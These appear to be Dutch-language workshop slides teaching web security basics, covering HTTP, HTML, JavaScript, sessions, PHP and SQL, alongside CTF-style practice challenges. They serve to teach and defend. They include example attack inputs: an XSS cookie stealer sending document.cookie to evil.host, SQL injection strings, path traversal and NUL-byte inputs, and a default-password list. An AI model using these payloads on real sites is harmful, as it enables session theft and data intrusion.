Webtechnieken

• Webserver
• Webapplicatie
• Dataopslag

Webserver

Een protocol is een afgesproken manier van praten tussen computers.

• HTTP is het HyperText Transfer Protocol
• Webservers serveren meestal webpagina's, geschreven in HTML (HyperText Markup Language)
• En soms programmacode, geschreven in Javascript

HTTP

• Protocol: https (HTTP beveiligd met TLS, S voor 'secure')
• Host: hackintheclass.nl (verbind met de webserver met adres "hackintheclass.nl")
• Verzoek (Request URI): /index.php?show=Workshops&page=1
• Bestands-/scriptnaam: /index.php
• Verzoekopties (query string): show=Workshops&page=1
  • Sommige velden uit formulieren komen hier terecht:
    • show: Workshops
    • page: 1

Pad naar het document

Wat gebeurt er als..

• Webbrowser zoekt "bitlair.nl" op in het Domain Name System (DNS)
  • Dat is een soort telefoonboek voor internetnamen
• DNS zegt dat bitlair.nl het IP-adres 2001:470:d1e7:1337:5054:ff:fe49:a94 heeft
• Verbindt met de webserver met adres 2001:470:d1e7:1337:5054:ff:fe49:a94
• Zet een beveiligde verbinding op (S staat voor Secure, ofwel beveiligd in HTTPS)
• Doe een ophaalverzoek (GET) voor de webpagina /Workshops

HTTP GET-verzoek

GET /logon.php?username=hax0r&password=supersecret123 HTTP/1.1
Host: bitlair.nl
Cookie: PHPSESSID=f1a1d9715b3491bbc2d5203c88ac67fb
Referer: https://bitlair.nl/index.php?action=showloginform
User-Agent: Mozilla/5.0 >--snip--< Chrome/69.0.4453.96

>-- end of request --<
            

HTTP POST-verzoek

POST /logon.php HTTP/1.1
Host: bitlair.nl
Cookie: PHPSESSID=f1a1d9715b3491bbc2d5203c88ac67fb
Referer: https://bitlair.nl/index.php?action=showloginform
User-Agent: Mozilla/5.0 >--snip--< Chrome/69.0.4453.96
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

username=hax0r&password=supersecret123
>-- end of request --<
            

Meer informatie over HTTP

• Mozilla HTTP tutorials

HTTP: Veelgemaakte fouten

• Geen versleuteling gebruiken (geen HTTPS)
• Informatie lekken

Fout: Geen versleuteling gebruiken

• Lokale aanvallers kunnen meeluisteren op het netwerk en wachtwoorden en andere geheimen zien
• De website kan worden gekaapt (door BGP kaping)
• Doorstuurservers (proxy) zien alle geheimen

Fout: Informatie lekken

• Webserver en PHP versienummers kunnen laten zien dat er een oude versie draait
• Foutberichten kunnen paden laten zien die aanvallers helpen met het vinden van dingen of om hun exploits af te stellen
• Indexes in submappen kunnen bestanden laten zien die per ongeluk zijn gepubliceerd
• Er kunnen backupbestanden (.bak of ~ extensie) zijn, .svn of .git mappen kunnen bestaan, die kunnen laten zien dat bestanden bestaan of geven broncode weg
• Een robots.txt bestand kan in hoogste map staan. Die is ontworpen om te zorgen dat zoekmachine spiders bepaalde bestanden niet bezoeken.
  • Waarom zouden mensen bestanden willen weghouden van google met een robots.txt bestand?
    • Kan het zijn dat ze probeerden om google links met delete_user=something niet te laten volgen?
    • Kan het zijn dat ze dachten dat het iets zou verbergen?

Speel HTTP uitdagingen

• Information disclosure level 1
• Information disclosure level 2
• Information disclosure level 3
• Information disclosure level 4

HTML

Ga eens naar een willekeurige webpagina, klik met rechts op de achtergrond en klik dan op "Paginabron bekijken".

Dit is ook beschikbaar door Ctrl in te drukken en tegelijk op U te drukken (Ctrl-U)

Simpele HTML

    <!doctype html>
    <html>
    <head>
      <title>Voorbeeld HTML website</title>
    </head>
    <body>
      <h1>Hoogste niveau kop</h1>
      <ul>
        <li><a href="http://www.google.nl">Google</a></li>
        <li><a href="https://bitlair.nl>Bitlair</a></li>
      </ul>
    </body>
    </html>

HTML-formulieren

    <form method="POST">
      <table>
        <tr>
          <td>Username:</td>
          <td><input type="text" name="username"></td>
        </tr>
        <tr>
          <td>Password:</td>
          <td><input type="password" name="password"></td>
        </tr>
      </table>
      <input type="submit" value="Log me in">
    </form>
            

Meer informatie over HTML

• Mozilla Learn HTML
• W3schools HTML tutorials

Speel met HTML-formulieren

HTML: Veelgemaakte fouten

• Informatie lekken
  • Kijk naar de broncode, er kan commentaar bij staan
  • Kijk ook naar alle scrips die in de HTML <script> tags staan
• Fouten met invoer van gebruikers (Cross Site Scripting/XSS)
  • Probeert eens iets als dit in een commentaarveld in te vullen: <script>alert("vulnerable");</script>
  • Dit had vertaald (encoded) moeten worden naar &lt;script&gt;alert(&quot;vulnerable&);&lt;/script&gt; zodat het geen geldige HTML wordt
  • Als deze encoding mist, dan krijg je een popup berichtje met de tekst "vulnerable"

Fout: Informatie lekken

• Sommige websites laten commentaar achter in de HTML <-- zoals dit commentaar. -->.
  • Dit kan informatie als standaardwachtwoorden of kwetsbare versienummers bevatten.

Fout: Niet encoden van gebruikersinvoer

• Veel websites laten gebruikersinvoer zien op een of andere manier. Denk hierbij aan commentaarsecties of hoeveel artikelen je bestelt
• Als dit niet HTML-encoded is, dan kunnen er HTML-tags of dubbele aanhalingstekens inzitten
  • Deze aanval heet Cross Site Scripting (XSS)
• Voorbeeld HTML-code: Je gaat nu 10<img src="https://i.imgur.com/R1g3YTc.jpg"> artikelen bestellen.
  • Dit laat een plaatje zien, niet alleen het getal 10
• Voorbeeld HTML-code: <input type="text" name="item_count" value="10"><img src="https://i.imgur.com/R1g3YTc.jpg">">.
  • Dit breekt uit het item_count invoerveld en laat een plaatje zien
• Dit is op te lossen door templates te gebruiken, of in PHP met htmlentities op alle plekken waar gebruikersinvoer wordt laten zien.
  • <img> tags worden &lt;img&gt; dus dan weet de browser dat het geen HTML is
  • Dit is ook waar voor andere HTML-tags

Speel HTML uitdagingen

• Cross Site Scripting (XSS) level 1

Javascript

• Het kan gebruikersinvoer controleren
• Het kan kleuren laten veranderen
• .. en nog veel meer

Javascript: voorbeeld

    <input type="text" id="username">
    <script type="text/javascript">
        // Dit vindt het HTML invoerveld (input) hierboven en stopt de inhoud in variabele usernameInput
        var usernameInput = document.getElementById("username");

        // Vergelijk wat de gebruiker heeft ingevuld bij username met het wachtwoord invoerveld.
        if (usernameInput.value == passwordInput.value) {
            // Gebruikersnaam en wachtwoord zijn hetzelfde
            ...
        }
    </script>
            

Meer informatie over javascript.

• Mozilla Learn Javascript
• W3schools Javascript tutorials

Javascript: Veelgemaakte fouten

• Het niet opnieuw controleren van invoer uit formulieren op de server.
• Het controleren van wachtwoorden of toestemmingen in de webbrowser, niet op de server.
• Gebruikers toestaan om javascript te injecteren in de pagina. (HTML encoding kwetsbaarheid: Cross Site Scripting/XSS).
• Javascript toestaan om de sessiecookie te lezen (httpOnly optie niet aan).
• Het invoegen van javascript van een server van iemand anders (bijv googleapis.com, jquery.org, github.io).
• Frames gebruiken met inhoud van derden (zoals advertenties) zonder toegangscontrole voor informatie op de pagina (sandboxing).

Fout: invoer niet controleren

• Voorbeeld: leeftijdscontrole op een credit card aanvraagformulier
  • Javascript uitschakelen en iedere leeftijd wordt geaccepteerd?
• Voorbeeld: Encoden van HTML entities (speciale tekens zoals <)
  • Javascript uitschakelen en encoding gebeurt niet?

Fout: Wachtwoord controleren in JS

• Kijk naar de broncode, zoek naar <script> tags of .js-bestanden.
• Wordt het wachtwoord gecontroleerd in javascript?
• Aan welke criteria moet het wachtwoord voldoen?
• Welke actie wordt ondernomen als het wachtwoord goed is?
• Iedere wachtwoordcontrole die alleen op de client wordt gedaan is onveilig.

Fout: Invoer niet encoden, JS toestaan

• Als HTML-code kan worden geïnjecteerd, dan kan Javascript ook.
• In XSS level 1 heb je een plaatje geïnjecteerd in een HTML-pagina.
• Wat als je ook scripts zou kunnen uitvoeren? <script>top.location.href='https://evil.host/';</script>
  • Dit stuurt gebruikers door naar een kwaadaardige web host.

Fout: JS toegang geven tot cookies

• Als HTML-code geïnjecteerd kan worden, kan het toegang hebben tot sessie cookies.
• In XSS level 1 heb je een plaatje geïnjecteerd in een HTML-pagina.
• Wat als je je session cookie kan krijgen? <script>alert(document.cookie);</script>
  • Dit laat een melding zien met je cookie.
• Wat als je alle sessie cookies kan verzamelen?
  <script>top.location.href='https://evil.host/stealer.php?'+document.cookie;</script>
  • Dit stuurt gebruikers door naar een kwaadaardige website en stuurt de cookies mee.

Fout: JS inladen van andere sites

• Als er ingebroken is op die site, dan kunnen ze ook deze website overnemen.
• Als die site kwaadaardig wordt, dan kunnen ze deze website overnemen.
• Als het IP of DNS wordt overgenomen (BGP kaping), dan kunnen aanvallers ook een certificaat krijgen via Let's Encrypt en deze website aanvallen.
• Beveiligingsbewuste mensen laten javascript van andere servers niet toe, want die javascript kan kwaadaardig zijn.
  • De website laadt dan niet voor hen.

Fout: JS niet beperken in frames

• Zonder iframe beperkingen kan javascript alle informatie lezen op de bovenliggende pagina
• Oplossing: het sandbox HTML attribuut
• De aanval: <script>alert(top.document.body.innerHTML);</script>

Speel Javascript uitdagingen

• Cross Site Scripting (XSS) level 2

Speel simpele Web-uitdagingen

• Login mistakes

Webapplicatie

• Als je https://bitlair.nl/index.php?page=Workshops bezoekt
• Server voert PHP-script "/index.php" uit
• PHP-script ziet de verzoekopties of query string (page=Workshops)
• PHP-script stelt de Workshops pagina samen

Sessies

• HTTP heeft geen geheugen (state). Ieder verzoek is onafhankelijk van andere verzoeken. Er zijn geen sessies.
• Om sessies op de server te implementeren, worden willekeurige getallen aan bezoekers gegeven
• Bezoekers slaan dit willekeurige getal op in een cookie.
• De cookie wordt meegestuurd met ieder verzoek aan de webpagina.
• De server kan opzoeken wie de gebruiker is, gebaseerd op de cookie.
• Dit noemen we een sessie (ID) cookie.

Cookie loginsessie

• Client: GET inlogpagina /login.php
• Server: geeft inlogpagina met header Set-Cookie: SESSIONID=xxxxxxx
• Client: POST inlogpagina met username=xxx&password=xxx met SESSIONID cookie
• Server: Slaat op dat gebruiker is ingelogd
• Client: GET beheerpagina /admin.php met SESSIONID cookie
• Server: Geeft beheerpagina, want de sessie is ingelogd

Sessiefouten

• Voorspelbare sessie-IDs
• Slechte cookie-instellingen, stelen toestaan.

Fout: Voorspelbare sessie-ID

• Als je sessie-ID een relatief klein getal is? Dan is het kwetsbaar.
• Als je sessie ID een hash is van een getal onder de 1 miljoen? Waarschijnlijk kwetsbaar
• Probeer eens de cookie van een hash van een ander getal (enumeratie).
  • Een van de sessies kan andere toestemmingen hebben.

Fout: Slechte cookie-instellingen

• De httpOnly optie voorkomt dat javascript toegang heeft tot de sessiecookie.
  • Cross Site Scripting (XSS) aanvallen als <script>top.location.href="https://evil.host/stealer.php?"+document.cookie</script> werken dan niet.
• De secure-optie voorkomt dat de cookie wordt verstuurd als de gebruiker de website bezoekt zonder versleuteling, door http://example.com in plaats van https.

Speel sessie-uitdagingen

• Probeer ons Koekjesmonster om de admin's cookie te stelen.
• Cross Site Scripting (XSS) level 3

PHP

• Het wordt uitgevoerd op de webserver
• Het haalt vaak informatie uit bestanden of een database
• Het kan verschillende webpagina-opties aan verschillende mensen laten zien

Webapplicaties: Veelgemaakte fouten

• Standaardwachtwoorden gebruiken
• Zwakke of gelekte wachtwoorden toestaan
• Loginpogingen over tijd niet beperken
• De webbrowser vertrouwen met geheimen
• Voorspelbare interacties (Wat Cross Site Request Forgery/CSRF mogelijk maakt)
• Componenten niet updaten
• Slechte controle van toestemmingen
• All fouten die eerder zijn genoemd in deze handleiding

Fout: Standaardwachtwoorden gebruiken

• Meest gebruikte standaardgebruikersnamen: admin, root, user, manager, system, operator, guest, setup, private
• Most gebruikte standaardwachtwoorden: Empty password, admin, ADMIN, password, PASSWORD, pass, system, SYSTEM, sys, user, manager, operator, guest, setup, private, letmein, calvin, forgetme!, changeme, welcome1, Welcome01!, 123, 1234, 123456
• Soms zijn standaardgebruikersnamen/-wachtwoorden niet makkelijk, maar lekken uiteindelijk toch. Dit worden ook wel achterdeuraccounts (back doors) genoemd en vereisen een beveiligingsupdate om te repareren.
• Zoek op het web om het standaardwachtwoord voor een apparaat te vinden als je die nodig hebt. Zo vind je die vaak.

Fout: Zwakke of gelekte wachtwoorden toestaan

• Zwakke wachtwoorden kunnen makkelijk worden gekraakt als de hashes ooit uitlekken
• Zwakke wachtwoorden staan in rainbow tables
• Aanvallers hebben lijsten met gebruikte wachtwoorden uit lekken of veelgebruikte wachtwoorden
• Ze kunnen gewoon proberen om in te loggen met alle veelgebruikte gebruikersnamen en wachtwoorden (brute force aanval)

Fout: Loginpogingen niet beperken

• Als een logingpoging 50 milliseconden duurt, kunnen aanvallers 20 wachtwoorden per seconden proberen
• Als ze 5 sessies tegelijk kunnen gebruiken, kunnen ze 100 wachtwoorden per seconden proberen
• Binnen 5 minuten hebben ze dan 30.000 wachtwoorden geprobeerd (brute force-aanval)
• Laat dat niet toe.
  • Laat een gebruiker niet vaker dan twee keer per 60 seconden proberen in te loggen (voor webapplicaties)
  • Laat een IP-adres niet vaker dan 3 keer per 30 seconden inloggen (voor webapplicaties)

Fout: Webbrowser vertrouwen met geheimen

• Deze cookie verloopt dan pas wanneer het wachtwoord verloopt.
• Dit geheim is opgeslagen in de browser zonder versleuteling, het kan worden gelezen door lokale aanvallers

Fout: Voorspelbare interacties

• Ieder formulier die niet iets willekeurigs erin heeft is voorspelbaar
  • Voorbeeld: https://example.com/admin/delete_user.php?userid=1
  • Als je die link aan iemand geeft die is ingelogd met beheertoegang, dan verwijdert dit gebruiker 1
• Deze aanval heet Cross Site Request Forgery (CSRF)
  • Vooral problematisch in combinatie met Cross Site Scripting (XSS)

Fout: Componenten niet updaten

• Als je componenten van anderen gebruikt, hou dan altijd kwetsbaarheden in de gaten die aan het licht komen.
• Bijvoorbeeld: oude versies van PHP zijn kwetsbaar voor NUL-byte (HTTP-encoded als %00) afsluiters van strings.
  • Dus file_get_contents($_GET['page'] . '.html') wordt dan kwetsbaar.
  • Als daar ../../../passwd%00 wordt opgevraagd als 'page', dan wordt de .html eraf gehaald, want NUL-byte beëindigd de string.
  • Het geeft dan niet een HTML-pagina, maar het bestand "/etc/passwd".
• Software up-to-date houden (patch management) en kwetsbaarheden in de gaten houden (vulnerability management) helpen beide om problemen onder controle te houden.
• Voor aanvallers helpt het ook om te zoeken naar kwetsbaarheden in de componenten van de webapplicatie.

Fout: Zwakke toestemmingencontrole

• Toestemmingen afdwingen in de webapplicatie, maar niet in geüploade documenten/statische inhoud.
• Toestemmingen afdwingen met Location header doorverwijzing, maar nog steeds de inhoud laten zien (heel kort).

Speel webapplicatie-uitdagingen

• CSRF level 1

Data

• In een database
• In het bestandssysteem (dus als bestand)

Database

• SQL - Structured Query Language
• Key-value opslag, zoals memcached, redis, berkeley database, lmdb, dbm
• Hierarchische opslag, zoals Bestandssystemen
• Hiërarchisch met attributen, zoals LDAP en X.500
• Documentopslag (key-value opslag met ook indexes en verwerking van inhoud van de value), zoals MongoDB en CouchDB

Data opvragen

• Structured Query Language - Gestructureerde opvraagtaal
• Kijk eens naar MySQL SELECT syntax
• SELECT fieldname1, fieldname2 FROM tablename WHERE condition

SQL commentaar - MySQL

• MySQL gebruikt # als commentaarkarakter. De meeste andere SQL-implementaties gebruiken " -- " (spaties belangrijk)
• Alles na het commentaarkarakter op die regel is commentaar.
• Commentaar wordt genegeerd door de SQL server.

            SELECT password     # Wachtwoordveld
            FROM users          # Gebruikerstabel
            WHERE id=1 OR id=2  # Gebruiker ID 1 of 2
            ORDER BY id ASC     # Sorteer op id, oplopend
            LIMIT 2             # Laat maar 2 records zien
            ;                   # Einde van de query            

SQL data wordt opgeslagen in tabellen

• Use SELECT userid, username, password, email FROM users WHERE userid='1'

* PS: Het is fout om wachtwoorden onversleuteld op te slaan, gebruik een wachtwoordgebaseerde sleutelafleidingsfunctie als PBKDF2 of bcrypt.

Speel met SQL

SQL: Veelgemaakte fouten

• Enumeratie
• SQL-injectie

Enumeratie

SQL-injectie

• SELECT userid, password FROM users WHERE username='$USERNAME'
• Wat als $USERNAME gebruikersinvoer is?
• Wat als $USERNAME "' OR 1=1 # " bevat?
• SELECT userid, password FROM users WHERE username='' OR 1=1 # '
• Dan voldoet iedere regel aan de criteria, want 1 is altijd gelijk aan 1

Probeer SQL-injectie

• ' OR 1=1 #
  • Dit maakt de SQL-opdracht onconditioneel, het werkt alles tegen na WHERE, want 1 is altijd 1
• ' OR 1=1 LIMIT 0,1 #
  • Onconditioneel, maar laat ook maar 1 regel zien, de eerste (laat 1 resultaat zien vanaf regel 0)
• ' AND 1=0 UNION SELECT 1,2,3,4 #
  • De originele vraag geeft niets terug en een samenvoeging (union) van niets en iets wat je wilt hebben, is wat je wilt hebben.
  • Let op dat bij een UNION-vraag het aantal kolommen van beide SELECT-opdrachten hetzelfde moet zijn
  • Probeer met UNION SELECT 1 #, UNION SELECT 1,2 #, UNION SELECT 1,2,3 #, etc

Speel SQL-injectie uitdagingen 1 en 2

• SQL injection level 1
• SQL injection level 2

Speel SQL-injectie uitdaging 3

• Vind de databasevraag (query), er is er maar 1 en die is kwetsbaar
• Zoek uit welke tabellen er zijn
• Zoek uit welke velden er in de relevante tabellen zijn
• Zoek de vlag
• Veel succes! Start hier SQL injection level 3

Bestandssysteem

Invoegen van bestandssysteem: veelgemaakte fouten

• Pad aflopen
• Bestand invoegen vanaf andere server (remote file inclusion)

Pad aflopen

• Alle besturingssystemen hebben de speciale mappen . en .. voor de huidige map en de bovenliggende map
• download.php?file=../index.php (POSIX-gebaseerde besturingssystemen: Linux, BSD, etc)
  • Dit downloadt index.php van de bovenliggende map!
• download.php?file=..\index.php or download.asp?file=..\index.asp (DOS-achtige besturingssystemen, zoals Windows)
• Soms is dit slecht opgelost, bijvoorbeeld alle "../" uit een pad weghalen
  • Maar wat nu met ....//? Als je alle ../ in ....// weghaalt is het resultaat weer ../!

Speel pad aflopen-uitdagingen 1 en 2

• Path traversal level 1
• Path traversal level 2

Speel pad aflopen-uitdaging 3

• Sommige programma's die geschreven zijn in C sluiten hun strings af als ze een NUL-byte tegenkomen (gecodeerd als %00 in URLs).
  • Software zoals PHP-versies voor 5.3
• Dit laat ons het .html-deel van $_GET['page_name'] . ".html" afstrippen en geeft ons toegang tot alle bestanden.
• Je kunt nu Path traversal level 3 spelen

Speel combineer vaardigheden-uitdagingen

• Als je alle bovenstaande uitdagingen hebt gedaan, kun je proberen om vaardigheden te combineren
• Om Combining skills 2 te spelen moet je eerst loginfoutjes en alle SQL-injecties en pad aflopen uitdagingen hebben gedaan
• Je kan nu Combining skills level 2 spelen

Hack in the Class

Web technologies